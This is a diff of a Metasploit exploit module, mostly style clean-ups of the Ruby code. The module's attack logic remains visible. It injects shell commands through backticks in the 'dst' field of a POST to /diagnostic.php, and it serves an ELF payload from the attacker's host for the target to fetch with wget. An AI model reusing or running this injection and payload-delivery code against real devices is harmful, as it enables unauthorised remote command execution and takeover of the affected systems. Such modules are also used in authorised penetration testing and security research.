@@ -44,7 +44,6 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2013-03-05',
         'Privileged' => true,
-        'Platform' => %w{linux unix},
         'Payload' => {
           'DisableNops' => true
         },
@@ -83,28 +82,26 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def request(cmd, uri)
-    begin
-      res = send_request_cgi({
-        'uri' => uri,
-        'method' => 'POST',
-        'vars_post' => {
-          "act" => "ping",
-          "dst" => "` #{cmd}`"
-        }
-      })
-      return res
-    rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
-      return nil
-    end
+    res = send_request_cgi({
+      'uri' => uri,
+      'method' => 'POST',
+      'vars_post' => {
+        'act' => 'ping',
+        'dst' => "` #{cmd}`"
+      }
+    })
+    return res
+  rescue ::Rex::ConnectionError
+    vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+    return nil
   end
 
   def exploit
-    downfile = datastore['DOWNFILE'] || rand_text_alpha(8 + rand(8))
+    downfile = datastore['DOWNFILE'] || rand_text_alpha(rand(8..15))
     uri = '/diagnostic.php'
 
     if target.name =~ /CMD/
-      if not (datastore['CMD'])
+      if !(datastore['CMD'])
         fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
       end
       cmd = payload.encoded
@@ -131,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # we use SRVHOST as download IP for the coming wget command.
       # SRVHOST needs a real IP address of our download host
-      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      if (datastore['SRVHOST'] == '0.0.0.0' or datastore['SRVHOST'] == '::')
         srv_host = Rex::Socket.source_address(rhost)
       else
         srv_host = datastore['SRVHOST']
@@ -142,9 +139,9 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
       start_service({
         'Uri' => {
-          'Proc' => Proc.new { |cli, req|
+          'Proc' => proc do |cli, req|
             on_request_uri(cli, req)
-          },
+          end,
           'Path' => resource_uri
         },
         'ssl' => false # do not use SSL
@@ -197,9 +194,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   # Handle incoming requests from the server
-  def on_request_uri(cli, request)
+  def on_request_uri(cli, _request)
     # print_status("on_request_uri called: #{request.inspect}")
-    if (not @pl)
+    if (!@pl)
       print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
       return
     end
@@ -213,7 +210,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("#{rhost}:#{rport} - Waiting for the target to request the ELF payload...")
 
     waited = 0
-    while (not @elf_sent)
+    until (@elf_sent)
       select(nil, nil, nil, 1)
       waited += 1
       if (waited > datastore['HTTP_DELAY'])
